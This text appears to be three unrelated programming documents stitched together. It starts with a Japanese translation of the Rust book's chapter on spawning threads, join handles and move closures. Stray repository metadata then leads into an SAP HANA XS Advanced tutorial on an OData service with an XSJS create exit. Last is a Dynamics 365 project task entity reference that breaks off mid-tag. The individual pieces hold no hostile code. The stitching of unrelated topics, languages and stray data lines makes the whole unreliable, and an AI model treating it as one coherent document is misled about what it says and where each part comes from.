新規スレッドを生成するには、`thread::spawn`関数を呼び出し、 新規スレッドで走らせたいコードを含むクロージャ(クロージャについては第13章で語りました)を渡します。 リスト16-1の例は、メインスレッドと新規スレッドからテキストを出力します: <!-- <span class="filename">Filename: src/main.rs</span> --> <span class="filename">ファイル名: src/main.rs</span> ```rust use std::thread; use std::time::Duration; fn main() { thread::spawn(|| { for i in 1..10 { // やあ!立ち上げたスレッドから数字{}だよ! println!("hi number {} from the spawned thread!", i); thread::sleep(Duration::from_millis(1)); } }); for i in 1..5 { // メインスレッドから数字{}だよ! println!("hi number {} from the main thread!", i); thread::sleep(Duration::from_millis(1)); } } ``` <!-- <span class="caption">Listing 16-1: Creating a new thread to print one thing --> <!-- while the main thread prints something else</span> --> <span class="caption">リスト16-1: メインスレッドが別のものを出力する間に新規スレッドを生成して何かを出力する</span> <!-- Note that with this function, the new thread will be stopped when the main --> <!-- thread ends, whether or not it has finished running. The output from this --> <!-- program might be a little different every time, but it will look similar to the --> <!-- following: --> この関数では、新しいスレッドは、実行が終わったかどうかにかかわらず、メインスレッドが終了したら停止することに注意してください。 このプログラムからの出力は毎回少々異なる可能性がありますが、だいたい以下のような感じでしょう: ```text hi number 1 from the main thread! hi number 1 from the spawned thread! hi number 2 from the main thread! hi number 2 from the spawned thread! hi number 3 from the main thread! hi number 3 from the spawned thread! hi number 4 from the main thread! hi number 4 from the spawned thread! hi number 5 from the spawned thread! ``` <!-- The calls to `thread::sleep` force a thread to stop its execution for a short --> <!-- duration, allowing a different thread to run. The threads will probably take --> <!-- turns, but that isn’t guaranteed: it depends on how your operating system --> <!-- schedules the threads. In this run, the main thread printed first, even though --> <!-- the print statement from the spawned thread appears first in the code. And even --> <!-- though we told the spawned thread to print until `i` is 9, it only got to 5 --> <!-- before the main thread shut down. --> `thread::sleep`を呼び出すと、少々の間、スレッドの実行を止め、違うスレッドを走らせることができます。 スレッドはおそらく切り替わるでしょうが、保証はありません: OSがスレッドのスケジュールを行う方法によります。 この実行では、コード上では立ち上げられたスレッドのprint文が先に現れているのに、メインスレッドが先に出力しています。また、 立ち上げたスレッドには`i`が9になるまで出力するよう指示しているのに、メインスレッドが終了する前の5までしか到達していません。 <!-- If you run this code and only see output from the main thread, or don’t see any --> <!-- overlap, try increasing the numbers in the ranges to create more opportunities --> <!-- for the operating system to switch between the threads. --> このコードを実行してメインスレッドの出力しか目の当たりにできなかったり、オーバーラップがなければ、 範囲の値を増やしてOSがスレッド切り替えを行う機会を増やしてみてください。 <!-- ### Waiting for All Threads to Finish Using `join` Handles --> ### `join`ハンドルで全スレッドの終了を待つ <!-- The code in Listing 16-1 not only stops the spawned thread prematurely most of --> <!-- the time due to the main thread ending, but also can’t guarantee that the --> <!-- spawned thread will get to run at all. The reason is that there is no guarantee --> <!-- on the order in which threads run! --> リスト16-1のコードは、メインスレッドが終了するためにほとんどの場合、立ち上げたスレッドがすべて実行されないだけでなく、 立ち上げたスレッドが実行されるかどうかも保証できません。原因は、スレッドの実行順に保証がないからです。 <!-- We can fix the problem of the spawned thread not getting to run, or not getting --> <!-- to run completely, by saving the return value of `thread::spawn` in a variable. --> <!-- The return type of `thread::spawn` is `JoinHandle`. A `JoinHandle` is an owned --> <!-- value that, when we call the `join` method on it, will wait for its thread to --> <!-- finish. Listing 16-2 shows how to use the `JoinHandle` of the thread we created --> <!-- in Listing 16-1 and call `join` to make sure the spawned thread finishes before --> <!-- `main` exits: --> `thread::spawn`の戻り値を変数に保存することで、立ち上げたスレッドが実行されなかったり、 完全には実行されなかったりする問題を修正することができます。`thread:spawn`の戻り値の型は`JoinHandle`です。 `JoinHandle`は、その`join`メソッドを呼び出したときにスレッドの終了を待つ所有された値です。 リスト16-2は、リスト16-1で生成したスレッドの`JoinHandle`を使用し、`join`を呼び出して、 `main`が終了する前に、立ち上げたスレッドが確実に完了する方法を示しています: <!-- <span class="filename">Filename: src/main.rs</span> --> <span class="filename">ファイル名: src/main.rs</span> ```rust use std::thread; use std::time::Duration; fn main() { let handle = thread::spawn(|| { for i in 1..10 { println!("hi number {} from the spawned thread!", i); thread::sleep(Duration::from_millis(1)); } }); for i in 1..5 { println!("hi number {} from the main thread!", i); thread::sleep(Duration::from_millis(1)); } handle.join().unwrap(); } ``` <!-- <span class="caption">Listing 16-2: Saving a `JoinHandle` from `thread::spawn` --> <!-- to guarantee the thread is run to completion</span> --> <span class="caption">リスト16-2: `thread::spawn`の`JoinHandle`を保存してスレッドが完了するのを保証する</span> <!-- Calling `join` on the handle blocks the thread currently running until the --> <!-- thread represented by the handle terminates. *Blocking* a thread means that --> <!-- thread is prevented from performing work or exiting. Because we’ve put the call --> <!-- to `join` after the main thread’s `for` loop, running Listing 16-2 should --> <!-- produce output similar to this: --> ハンドルに対して`join`を呼び出すと、ハンドルが表すスレッドが終了するまで現在実行中のスレッドをブロックします。 スレッドを*ブロック*するとは、そのスレッドが動いたり、終了したりすることを防ぐことです。 `join`の呼び出しをメインスレッドの`for`ループの後に配置したので、リスト16-2を実行すると、 以下のように出力されるはずです: ```text hi number 1 from the main thread! hi number 2 from the main thread! hi number 1 from the spawned thread! hi number 3 from the main thread! hi number 2 from the spawned thread! hi number 4 from the main thread! hi number 3 from the spawned thread! hi number 4 from the spawned thread! hi number 5 from the spawned thread! hi number 6 from the spawned thread! hi number 7 from the spawned thread! hi number 8 from the spawned thread! hi number 9 from the spawned thread! ``` <!-- The two threads continue alternating, but the main thread waits because of the --> <!-- call to `handle.join()` and does not end until the spawned thread is finished. --> 2つのスレッドが代わる代わる実行されていますが、`handle.join()`呼び出しのためにメインスレッドは待機し、 立ち上げたスレッドが終了するまで終わりません。 <!-- But let’s see what happens when we instead move `handle.join()` before the --> <!-- `for` loop in `main`, like this: --> ですが、代わりに`handle.join()`を`for`ループの前に移動したらどうなるのか確認しましょう。こんな感じに: <!-- <span class="filename">Filename: src/main.rs</span> --> <span class="filename">ファイル名: src/main.rs</span> ```rust use std::thread; use std::time::Duration; fn main() { let handle = thread::spawn(|| { for i in 1..10 { println!("hi number {} from the spawned thread!", i); thread::sleep(Duration::from_millis(1)); } }); handle.join().unwrap(); for i in 1..5 { println!("hi number {} from the main thread!", i); thread::sleep(Duration::from_millis(1)); } } ``` <!-- The main thread will wait for the spawned thread to finish and then run its --> <!-- `for` loop, so the output won’t be interleaved anymore, as shown here: --> メインスレッドは、立ち上げたスレッドが終了するまで待ち、それから`for`ループを実行するので、 以下のように出力はもう混ざらないでしょう: ```text hi number 1 from the spawned thread! hi number 2 from the spawned thread! hi number 3 from the spawned thread! hi number 4 from the spawned thread! hi number 5 from the spawned thread! hi number 6 from the spawned thread! hi number 7 from the spawned thread! hi number 8 from the spawned thread! hi number 9 from the spawned thread! hi number 1 from the main thread! hi number 2 from the main thread! hi number 3 from the main thread! hi number 4 from the main thread! ``` <!-- Small details, such as where `join` is called, can affect whether or not your --> <!-- threads run at the same time. --> どこで`join`を呼ぶかといったほんの些細なことが、スレッドが同時に走るかどうかに影響することもあります。 <!-- ### Using `move` Closures with Threads --> ### スレッドで`move`クロージャを使用する <!-- The `move` closure is often used alongside `thread::spawn` because it allows --> <!-- you to use data from one thread in another thread. --> `move`クロージャは、`thread::spawn`とともによく使用されます。 あるスレッドのデータを別のスレッドで使用できるようになるからです。 <!-- In Chapter 13, we mentioned we can use the `move` keywrod before the parameter --> <!-- list of a closure to force the closure to take ownership of the values it uses --> <!-- in the environment. This technique is especially useful when creating new --> <!-- threads in order to transfer ownership of values from one thread to another. --> 第13章で、クロージャの引数リストの前に`move`キーワードを使用して、 クロージャに環境で使用している値の所有権を強制的に奪わせることができると述べました。 このテクニックは、あるスレッドから別のスレッドに値の所有権を移すために新しいスレッドを生成する際に特に有用です。 <!-- Notice in Listing 16-1 that the closure we pass to `thread::spawn` takes no --> <!-- arguments: we’re not using any data from the main thread in the spawned --> <!-- thread’s code. To use data from the main thread in the spawned thread, the --> <!-- spawned thread’s closure must capture the values it needs. Listing 16-3 shows --> <!-- an attempt to create a vector in the main thread and use it in the spawned --> <!-- thread. However, this won’t yet work, as you’ll see in a moment: --> リスト16-1において、`thread::spawn`に渡したクロージャには引数がなかったことに注目してください: 立ち上げたスレッドのコードでメインスレッドからのデータは何も使用していないのです。 立ち上げたスレッドでメインスレッドのデータを使用するには、立ち上げるスレッドのクロージャは、 必要な値をキャプチャしなければなりません。リスト16-3は、メインスレッドでベクタを生成し、 立ち上げたスレッドで使用する試みを示しています。しかしながら、すぐにわかるように、これはまだ動きません: <!-- <span class="filename">Filename: src/main.rs</span> --> <span class="filename">ファイル名: src/main.rs</span> ```rust,ignore use std::thread; fn main() { let v = vec![1, 2, 3]; let handle = thread::spawn(|| { // こちらがベクタ: {:?} println!("Here's a vector: {:?}", v); }); handle.join().unwrap(); } ``` <!-- <span class="caption">Listing 16-3: Attempting to use a vector created by the --> <!-- main thread in another thread</span> --> <span class="caption">リスト16-3: 別のスレッドでメインスレッドが生成したベクタを使用しようとする</span> <!-- The closure uses `v`, so it will capture `v` and make it part of the closure’s --> <!-- environment. Because `thread::spawn` runs this closure in a new thread, we --> <!-- should be able to access `v` inside that new thread. But when we compile this --> <!-- example, we get the following error: --> クロージャは`v`を使用しているので、`v`をキャプチャし、クロージャの環境の一部にしています。 `thread::spawn`はこのクロージャを新しいスレッドで走らせるので、 その新しいスレッド内で`v`にアクセスできるはずです。しかし、このコードをコンパイルすると、 以下のようなエラーが出ます: ```text error[E0373]: closure may outlive the current function, but it borrows `v`, which is owned by the current function (エラー: クロージャは現在の関数よりも長生きするかもしれませんが、現在の関数が所有している `v`を借用しています) --> src/main.rs:6:32 | 6 | let handle = thread::spawn(|| { | ^^ may outlive borrowed value `v` 7 | println!("Here's a vector: {:?}", v); | - `v` is borrowed here | help: to force the closure to take ownership of `v` (and any other referenced variables), use the `move` keyword (助言: `v`(や他の参照されている変数)の所有権をクロージャに奪わせるには、`move`キーワードを使用してください) | 6 | let handle = thread::spawn(move || { | ^^^^^^^ ``` <!-- Rust *infers* how to capture `v`, and because `println!` only needs a reference --> <!-- to `v`, the closure tries to borrow `v`. However, there’s a problem: Rust can’t --> <!-- tell how long the spawned thread will run, so it doesn’t know if the reference --> <!-- to `v` will always be valid. --> Rustは`v`のキャプチャ方法を*推論*し、`println!`は`v`への参照のみを必要とするので、クロージャは、 `v`を借用しようとします。ですが、問題があります: コンパイラには、立ち上げたスレッドがどのくらいの期間走るのかわからないので、 `v`への参照が常に有効であるか把握できないのです。 <!-- Listing 16-4 provides a scenario that’s more likely to have a reference to `v` --> <!-- that won’t be valid: --> リスト16-4は、`v`への参照がより有効でなさそうな筋書きです: <!-- <span class="filename">Filename: src/main.rs</span> --> <span class="filename">ファイル名: src/main.rs</span> ```rust,ignore use std::thread; fn main() { let v = vec![1, 2, 3]; let handle = thread::spawn(|| { println!("Here's a vector: {:?}", v); }); // いや〜! drop(v); // oh no! handle.join().unwrap(); } ``` <!-- <span class="caption">Listing 16-4: A thread with a closure that attempts to --> <!-- capture a reference to `v` from a main thread that drops `v`</span> --> <span class="caption">リスト16-4: `v`をドロップするメインスレッドから`v`への参照をキャプチャしようとするクロージャを伴うスレッド</span> <!-- If we were allowed to run this code, there’s a possibility the spawned thread --> <!-- would be immediately put in the background without running at all. The spawned --> <!-- thread has a reference to `v` inside, but the main thread immediately drops --> <!-- `v`, using the `drop` function we discussed in Chapter 15. Then, when the --> <!-- spawned thread starts to execute, `v` is no longer valid, so a reference to it --> <!-- is also invalid. Oh no! --> このコードを実行できてしまうなら、立ち上げたスレッドはまったく実行されることなく即座にバックグラウンドに置かれる可能性があります。 立ち上げたスレッドは内部に`v`への参照を保持していますが、メインスレッドは、第15章で議論した`drop`関数を使用して、 即座に`v`をドロップしています。そして、立ち上げたスレッドが実行を開始する時には、`v`はもう有効ではなく、 参照も不正になるのです。あちゃー! <!-- To fix the compiler error in Listing 16-3, we can use the error message’s --> <!-- advice: --> リスト16-3のコンパイルエラーを修正するには、エラーメッセージのアドバイスを活用できます: ```text help: to force the closure to take ownership of `v` (and any other referenced variables), use the `move` keyword | 6 | let handle = thread::spawn(move || { | ^^^^^^^ ``` <!-- By adding the `move` keyword before the closure, we force the closure to take --> <!-- ownership of the values it’s using rather than allowing Rust to infer that it --> <!-- should borrow the values. The modification to Listing 16-3 shown in Listing --> <!-- 16-5 will compile and run as we intend: --> クロージャの前に`move`キーワードを付することで、コンパイラに値を借用すべきと推論させるのではなく、 クロージャに使用している値の所有権を強制的に奪わせます。リスト16-5に示したリスト16-3に対する変更は、 コンパイルでき、意図通りに動きます: <!-- <span class="filename">Filename: src/main.rs</span> --> <span class="filename">ファイル名: src/main.rs</span> ```rust use std::thread; fn main() { let v = vec![1, 2, 3]; let handle = thread::spawn(move || { println!("Here's a vector: {:?}", v); }); handle.join().unwrap(); } ``` <!-- <span class="caption">Listing 16-5: Using the `move` keyword to force a closure --> <!-- to take ownership of the values it uses</span> --> <span class="caption">リスト16-5: `move`キーワードを使用してクロージャに使用している値の所有権を強制的に奪わせる</span> <!-- What would happen to the code in Listing 16-4 where the main thread called --> <!-- `drop` if we use a `move` closure? Would `move` fix that case? Unfortunately, --> <!-- no; we would get a different error because what Listing 16-4 is trying to do --> <!-- isn’t allowed for a different reason. If we added `move` to the closure, we --> <!-- would move `v` into the closure’s environment, and we could no longer call --> <!-- `drop` on it in the main thread. We would get this compiler error instead: --> `move`クロージャを使用していたら、メインスレッドが`drop`を呼び出すリスト16-4のコードはどうなるのでしょうか? `move`で解決するのでしょうか?残念ながら、違います; リスト16-4が試みていることは別の理由によりできないので、 違うエラーが出ます。クロージャに`move`を付与したら、`v`をクロージャの環境にムーブするので、 最早メインスレッドで`drop`を呼び出すことは叶わなくなるでしょう。代わりにこのようなコンパイルエラーが出るでしょう: ```text error[E0382]: use of moved value: `v` (エラー: ムーブされた値の使用: `v`) --> src/main.rs:10:10 | 6 | let handle = thread::spawn(move || { | ------- value moved (into closure) here ... 10 | drop(v); // oh no! | ^ value used here after move | = note: move occurs because `v` has type `std::vec::Vec<i32>`, which does not implement the `Copy` trait (注釈: `v`の型が`std::vec::Vec<i32>`のためムーブが起きました。この型は、`Copy`トレイトを実装していません) ``` <!-- Rust’s ownership rules have saved us again! We got an error from the code in --> <!-- Listing 16-3 because Rust was being conservative and only borrowing `v` for the --> <!-- thread, which meant the main thread could theoretically invalidate the spawned --> <!-- thread’s reference. By telling Rust to move ownership of `v` to the spawned --> <!-- thread, we’re guaranteeing Rust that the main thread won’t use `v` anymore. If --> <!-- we change Listing 16-4 in the same way, we’re then violating the ownership --> <!-- rules when we try to use `v` in the main thread. The `move` keyword overrides --> <!-- Rust’s conservative default of borrowing; it doesn’t let us violate the --> <!-- ownership rules. --> 再三Rustの所有権規則が救ってくれました!リスト16-3のコードはエラーになりました。 コンパイラが一時的に保守的になり、スレッドに対して`v`を借用しただけだったからで、 これは、メインスレッドは理論上、立ち上げたスレッドの参照を不正化する可能性があることを意味します。 `v`の所有権を立ち上げたスレッドに移動するとコンパイラに指示することで、 メインスレッドはもう`v`を使用しないとコンパイラに保証しているのです。リスト16-4も同様に変更したら、 メインスレッドで`v`を使用しようとする際に所有権の規則に違反することになります。 `move`キーワードにより、Rustの保守的な借用のデフォルトが上書きされるのです; 所有権の規則を侵害させてくれないのです。 <!-- With a basic understanding of threads and the thread API, let’s look at what we --> <!-- can *do* with threads. --> スレッドとスレッドAPIの基礎知識を得たので、スレッドで*できる*ことを見ていきましょう。
39.810193
88
0.711814
eng_Latn
0.986957
bb258b91dc2fe3cc71a73101a6778a6b7882405d
12,760
md
Markdown
tutorials/xsa-xsodata-create/xsa-xsodata-create.md
michal-keidar/Tutorials
348af25b7caad062f67f6371e4ce8b4017a03a74
[ "Apache-2.0" ]
null
null
null
tutorials/xsa-xsodata-create/xsa-xsodata-create.md
michal-keidar/Tutorials
348af25b7caad062f67f6371e4ce8b4017a03a74
[ "Apache-2.0" ]
null
null
null
tutorials/xsa-xsodata-create/xsa-xsodata-create.md
michal-keidar/Tutorials
348af25b7caad062f67f6371e4ce8b4017a03a74
[ "Apache-2.0" ]
null
null
null
--- title: SAP HANA XS Advanced, Creating an OData Service with Create Operation and XSJS Exit description: Creating an the basic database artifacts, an OData Service with Create Operation and XSJS Exit to insert data into Entities primary_tag: products>sap-hana tags: [ tutorial>intermediate, topic>odata, products>sap-hana, products>sap-hana\,-express-edition ] --- ## Prerequisites - **Proficiency:** Intermediate - **Tutorials:** [Creating an OData Service with an Entity Relationship](https://www.sap.com/developer/tutorials/xsa-xsodata-entity.html) ## Next Steps - [Tutorial Catalog](https://www.sap.com/developer/tutorial-navigator.html) ## Details ### You will learn Now to expand your code to include an XSJS exit. ### Time to Complete **15 Min**. --- [ACCORDION-BEGIN [Step 1: ](Create User entity and DB artifacts)] You will first create the entities that will be modified by the XSJS exit in your OData service. The exit will create a new User in the User table. In your `scr\data` folder, create a file called `UserData.hdbcds`. The editor may automatically open the Graphical Editor, in that case, right-click on the new file and Open with the `Code Editor`. ![Create UserData.hdbcds](1.png) Delete any existing content and paste the following entities definition: ``` using Core; @OData.publish : true context UserData { entity User { key UserId : Integer; FirstName : String(40); LastName : String(40); Email : String(255); }; entity User2 { key UserId : Integer; FirstName : String(40); LastName : String(40); Email : String(255); }; }; ``` Additionally, if you have not done so yet, under `src`, create a folder called `sequences` and add a file called `userSeqId.hdbsequence` with the following code: ``` SEQUENCE "userSeqId" START WITH 1000000225 MAXVALUE 1999999999 RESET BY SELECT IFNULL(MAX("UserId"), 1000000225) + 1 FROM "UserData.User" ``` This sequence will serve the auto-increment id for the new entries in the User table. **Build the `src` folder**. [ACCORDION-END] [ACCORDION-BEGIN [Step 2: ](Create the first XSJS library)] In the `xsjs` folder create the file `usersCreateMethod.xsjslib`. This is a server-side JavaScript library. This will be the exit code that performs the validation before the insert of the new record. Here is the code for this file. ``` /*eslint no-console: 0, no-unused-vars: 0, dot-notation: 0, no-use-before-define: 0, no-redeclare: 0*/ "use strict"; $.import("user.xsjs", "session"); var SESSIONINFO = $.user.xsjs.session; /** @param {connection} Connection - The SQL connection used in the OData request @param {beforeTableName} String - The name of a temporary table with the single entry before the operation (UPDATE and DELETE events only) @param {afterTableName} String -The name of a temporary table with the single entry after the operation (CREATE and UPDATE events only) */ function usersCreate(param){ var after = param.afterTableName; //Get Input New Record Values var pStmt = param.connection.prepareStatement("select * from \"" + after + "\""); var User = SESSIONINFO.recordSetToJSON(pStmt.executeQuery(), "Details"); pStmt.close(); //Validate Email if(!validateEmail(User.Details[0].Email)){ throw "Invalid email for " + User.Details[0].FirstName + " No Way! E-Mail must be valid and " + User.Details[0].Email + " has problems"; } //Get Next Personnel Number pStmt = param.connection.prepareStatement("select \"userSeqId\".NEXTVAL from dummy"); var rs = pStmt.executeQuery(); var PersNo = ""; while (rs.next()) { PersNo = rs.getString(1); } pStmt.close(); //Insert Record into DB Table and Temp Output Table for( var i = 0; i<2; i++){ var pStmt; if(i<1){ pStmt = param.connection.prepareStatement("insert into \"UserData.User\" values(?,?,?,?,?)" ); }else{ pStmt = param.connection.prepareStatement("TRUNCATE TABLE \"" + after + "\"" ); pStmt.executeUpdate(); pStmt.close(); pStmt = param.connection.prepareStatement("insert into \"" + after + "\" values(?,?,?,?,?)" ); } pStmt.setString(1, PersNo.toString()); pStmt.setString(2, User.Details[0].FirstName.toString()); pStmt.setString(3, User.Details[0].LastName.toString()); pStmt.setString(4, User.Details[0].Email.toString()); pStmt.setString(5, ""); pStmt.executeUpdate(); pStmt.close(); } } function validateEmail(email) { var re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/; return re.test(email); } ``` [ACCORDION-END] [ACCORDION-BEGIN [Step 3: ](Create new OData service)] Create another OData service named `user.xsodata` for `User.Details`. You will link the **Create** operation to the `usersCreate` function on the server-side JavaScript library you have just created. ``` service { "User.Details" as "Users" create using "xsjs:usersCreateMethod.xsjslib::usersCreate"; } ``` And it should look like this: ![New service](2.png) [ACCORDION-END] [ACCORDION-BEGIN [Step 4: ](Create the second XSJS library)] Create another file in the `xsjs` folder named `session.xsjslib`. Here is the code for this file. ``` /** @function Outputs the Session user and Language as JSON in the Response body */ function fillSessionInfo(){ var body = ''; body = JSON.stringify({ "session" : [{"UserName": $.session.getUsername(), "Language": $.session.language}] }); $.response.contentType = 'application/json'; $.response.setBody(body); $.response.status = $.net.http.OK; } /** @function Escape Special Characters in JSON strings @param {string} input - Input String @returns {string} the same string as the input but now escaped */ function escapeSpecialChars(input) { if(typeof(input) != 'undefined' && input != null) { return input .replace(/[\\]/g, '\\\\') .replace(/[\"]/g, '\\\"') .replace(/[\/]/g, '\\/') .replace(/[\b]/g, '\\b') .replace(/[\f]/g, '\\f') .replace(/[\n]/g, '\\n') .replace(/[\r]/g, '\\r') .replace(/[\t]/g, '\\t'); } else{ return ""; } } /** @function Escape Special Characters in Text strings (CSV and Tab Delimited) @param {string} input - Input String @returns {string} the same string as the input but now escaped */ function escapeSpecialCharsText(input) { if(typeof(input) != 'undefined' && input != null) { input.replace(/[\"]/g, '\"\"'); if(input.indexOf(",") >= 0 || input.indexOf("\t") >= 0 || input.indexOf(";") >= 0 || input.indexOf("\n") >= 0 || input.indexOf('"') >= 0 ) {input = '"'+input+'"';} return input; } else{ return ""; } } /** @function Converts any XSJS RecordSet object to a Text String output @param {object} rs - XSJS Record Set object @param {optional Boolean} bHeaders - defines if you want column headers output as well; defaults to true @param {optional String} delimiter - supplies the delimiter used between columns; defaults to tab (\\t) @returns {String} The text string with the contents of the record set */ function recordSetToText(rs,bHeaders,delimiter){ bHeaders = typeof bHeaders !== 'undefined' ? bHeaders : true; delimiter = typeof delimiter !== 'undefined' ? delimiter : '\t'; //Default to Tab Delimited var outputString = ''; var value = ''; var meta = rs.getMetaData(); var colCount = meta.getColumnCount(); //Process Headers if(bHeaders){ for (var i=1; i<=colCount; i++) { outputString += escapeSpecialCharsText(meta.getColumnLabel(i)) + delimiter; } outputString += '\n'; //Add New Line } while (rs.next()) { for (var i=1; i<=colCount; i++) { switch(meta.getColumnType(i)) { case $.db.types.VARCHAR: case $.db.types.CHAR: value += rs.getString(i); break; case $.db.types.NVARCHAR: case $.db.types.NCHAR: case $.db.types.SHORTTEXT: value += rs.getNString(i); break; case $.db.types.TINYINT: case $.db.types.SMALLINT: case $.db.types.INT: case $.db.types.BIGINT: value += rs.getInteger(i); break; case $.db.types.DOUBLE: value += rs.getDouble(i); break; case $.db.types.DECIMAL: value += rs.getDecimal(i); break; case $.db.types.REAL: value += rs.getReal(i); break; case $.db.types.NCLOB: case $.db.types.TEXT: value += rs.getNClob(i); break; case $.db.types.CLOB: value += rs.getClob(i); break; case $.db.types.BLOB: value += $.util.convert.encodeBase64(rs.getBlob(i)); break; case $.db.types.DATE: value += rs.getDate(i); break; case $.db.types.TIME: value += rs.getTime(i); break; case $.db.types.TIMESTAMP: value += rs.getTimestamp(i); break; case $.db.types.SECONDDATE: value += rs.getSeconddate(i); break; default: value += rs.getString(i); } outputString += escapeSpecialCharsText(value) + delimiter; value = ''; } outputString += '\n'; //Add New Line } return outputString; } /** @function Converts any XSJS RecordSet object to a JSON Object @param {object} rs - XSJS Record Set object @param {optional String} rsName - name of the record set object in the JSON @returns {object} JSON representation of the record set data */ function recordSetToJSON(rs,rsName){ rsName = typeof rsName !== 'undefined' ? rsName : 'entries'; var meta = rs.getMetaData(); var colCount = meta.getColumnCount(); var values=[]; var table=[]; var value=""; while (rs.next()) { for (var i=1; i<=colCount; i++) { value = '"'+meta.getColumnLabel(i)+'" : '; switch(meta.getColumnType(i)) { case $.db.types.VARCHAR: case $.db.types.CHAR: value += '"'+ escapeSpecialChars(rs.getString(i))+'"'; break; case $.db.types.NVARCHAR: case $.db.types.NCHAR: case $.db.types.SHORTTEXT: value += '"'+escapeSpecialChars(rs.getNString(i))+'"'; break; case $.db.types.TINYINT: case $.db.types.SMALLINT: case $.db.types.INT: case $.db.types.BIGINT: value += rs.getInteger(i); break; case $.db.types.DOUBLE: value += rs.getDouble(i); break; case $.db.types.DECIMAL: value += rs.getDecimal(i); break; case $.db.types.REAL: value += rs.getReal(i); break; case $.db.types.NCLOB: case $.db.types.TEXT: value += '"'+ escapeSpecialChars(rs.getNClob(i))+'"'; break; case $.db.types.CLOB: value += '"'+ escapeSpecialChars(rs.getClob(i))+'"'; break; case $.db.types.BLOB: value += '"'+ $.util.convert.encodeBase64(rs.getBlob(i))+'"'; break; case $.db.types.DATE: var dateTemp = new Date(); dateTemp.setDate(rs.getDate(i)); var dateString = dateTemp.toJSON(); value += '"'+dateString+'"'; break; case $.db.types.TIME: var dateTemp = new Date(); dateTemp.setDate(rs.getTime(i)); var dateString = dateTemp.toJSON(); value += '"'+dateString+'"'; break; case $.db.types.TIMESTAMP: var dateTemp = new Date(); dateTemp.setDate(rs.getTimestamp(i)); var dateString = dateTemp.toJSON(); value += '"'+dateString+'"'; break; case $.db.types.SECONDDATE: var dateTemp = new Date(); dateTemp.setDate(rs.getSeconddate(i)); var dateString = dateTemp.toJSON(); value += '"'+dateString+'"'; break; default: value += '"'+escapeSpecialChars(rs.getString(i))+'"'; } values.push(value); } table.push('{'+values+'}'); } return JSON.parse('{"'+ rsName +'" : [' + table +']}'); } ``` [ACCORDION-END] [ACCORDION-BEGIN [Step 5: ](Save and run)] Save and run the Node.js and then run the web module. Change the URL to `/xsodata/user.xsodata` to see if the service is available. ![Results](4.png) Unfortunately its much more complicated to test Create/Update/Delete methods from the browser as they create other HTTP verbs. Browse into the next steps in the XS Advanced tutorials for SAPUI5 interfaces to employ these services. [ACCORDION-END] ## Next Steps - [Tutorial Catalog](https://www.sap.com/developer/tutorial-navigator.html)
72.090395
6,885
0.617476
eng_Latn
0.317405
bb25a2f9df6cf0628844c74a436cfc395db41641
938
md
Markdown
README.md
macnick/members-only
ac76a87e3fb364dadd595ac2b17fca17b44b0cb0
[ "MIT" ]
3
2020-03-30T10:21:46.000Z
2020-12-04T08:20:15.000Z
README.md
macnick/members-only
ac76a87e3fb364dadd595ac2b17fca17b44b0cb0
[ "MIT" ]
3
2019-11-20T09:55:11.000Z
2020-03-04T08:00:24.000Z
README.md
macnick/members-only
ac76a87e3fb364dadd595ac2b17fca17b44b0cb0
[ "MIT" ]
1
2019-12-09T23:26:13.000Z
2019-12-09T23:26:13.000Z
# Members only project using Ruby on Rails In this project, you’ll be building an exclusive clubhouse where your members can write embarrassing posts about non-members. Inside the clubhouse, members can see who the author of a post is but, outside, they can only see the story and wonder who wrote it. ## Screenshot ![screenshot](app/assets/images/screenshot.png) ## Getting started To get started with the app, first clone the repo ``` git clone https://github.com/macnick/members-only.git ``` Then install the needed gems: ``` bundle install --without production ``` Next, migrate the database: ``` rails db:migrate ``` Finally, run the app in a local server: ``` rails server ``` ## Contributors 1. [Nick Haralampopoulos](www.github.com/macnick) 2. [Daniel Larbi Addo](www.github.com/addod19) To see more information and learn about Rails check this [Ruby on Rails](https://www.railstutorial.org/book) Tutorial book.
22.878049
258
0.746269
eng_Latn
0.995052
bb26184ebde66b30d747a6c8c4b776bc22f3dba5
81,851
md
Markdown
ce/customerengagement/on-premises/developer/entities/msdyn_projecttask.md
Gen1a/dynamics-365-customer-engagement
ce3c02bfa54594f016166522e552982fb66a9389
[ "CC-BY-4.0", "MIT" ]
null
null
null
ce/customerengagement/on-premises/developer/entities/msdyn_projecttask.md
Gen1a/dynamics-365-customer-engagement
ce3c02bfa54594f016166522e552982fb66a9389
[ "CC-BY-4.0", "MIT" ]
null
null
null
ce/customerengagement/on-premises/developer/entities/msdyn_projecttask.md
Gen1a/dynamics-365-customer-engagement
ce3c02bfa54594f016166522e552982fb66a9389
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: "msdyn_projecttask Entity Reference (Dynamics 365 Customer Engagement)| MicrosoftDocs" description: "Includes schema information and supported messages for the msdyn_projecttask entity." ms.date: 04/02/2019 ms.topic: "reference" ms.assetid: 3948cc48-07c8-7f60-0608-71c37158ad7c author: "KumarVivek" ms.author: "kvivek" manager: "annbe" search.audienceType: - developer --- # msdyn_projecttask Entity Reference Tasks related to project. **Added by**: Project Service Automation Solution ## Messages |Message|Web API Operation|SDK Assembly| |-|-|-| |Assign|PATCH [*org URI*]/api/data/v9.0/msdyn_projecttasks(*msdyn_projecttaskid*)<br />[Update](/powerapps/developer/common-data-service/webapi/update-delete-entities-using-web-api#basic-update) `ownerid` property.|<xref:Microsoft.Crm.Sdk.Messages.AssignRequest>| |Create|POST [*org URI*]/api/data/v9.0/msdyn_projecttasks<br />See [Create](/powerapps/developer/common-data-service/webapi/create-entity-web-api)|<xref:Microsoft.Xrm.Sdk.Messages.CreateRequest> or <br /><xref:Microsoft.Xrm.Sdk.IOrganizationService.Create*>| |Delete|DELETE [*org URI*]/api/data/v9.0/msdyn_projecttasks(*msdyn_projecttaskid*)<br />See [Delete](/powerapps/developer/common-data-service/webapi/update-delete-entities-using-web-api#basic-delete)|<xref:Microsoft.Xrm.Sdk.Messages.DeleteRequest> or <br /><xref:Microsoft.Xrm.Sdk.IOrganizationService.Delete*>| |GrantAccess|<xref href="Microsoft.Dynamics.CRM.GrantAccess?text=GrantAccess Action" />|<xref:Microsoft.Crm.Sdk.Messages.GrantAccessRequest>| |IsValidStateTransition|<xref href="Microsoft.Dynamics.CRM.IsValidStateTransition?text=IsValidStateTransition Function" />|<xref:Microsoft.Crm.Sdk.Messages.IsValidStateTransitionRequest>| |ModifyAccess|<xref 